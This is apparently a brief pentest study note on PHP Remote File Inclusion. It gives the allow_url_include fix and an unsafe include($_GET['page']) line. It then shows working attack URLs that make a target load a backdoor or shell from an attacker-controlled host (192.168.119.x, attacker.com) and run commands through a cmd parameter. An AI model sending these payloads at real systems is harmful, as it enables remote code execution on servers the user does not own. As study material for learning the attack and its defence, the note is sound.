To fix RFI, disable allow_url_include in PHP to block inclusion of remote files, and never include files directly from user input URLs. Use safe methods like cURL if remote content is needed.

allow_url_include = Off

include($_GET['page']); // unsafe

Find PHP webshells to test

ls /usr/share/webshells/php/

RFI command execution example

curl "http://mountaindesserts.com/meteor/index.php?page=http://192.168.119.3/simple-backdoor.php&cmd=ls"

Another RFI example

http://10.11.1.35/section.php?page=http://192.168.119.168:80/hacker.txt

https://example.com/index.php?page=https://attacker.com/shell.php

Left-click: follow link, Right-click: select node, Scroll: zoom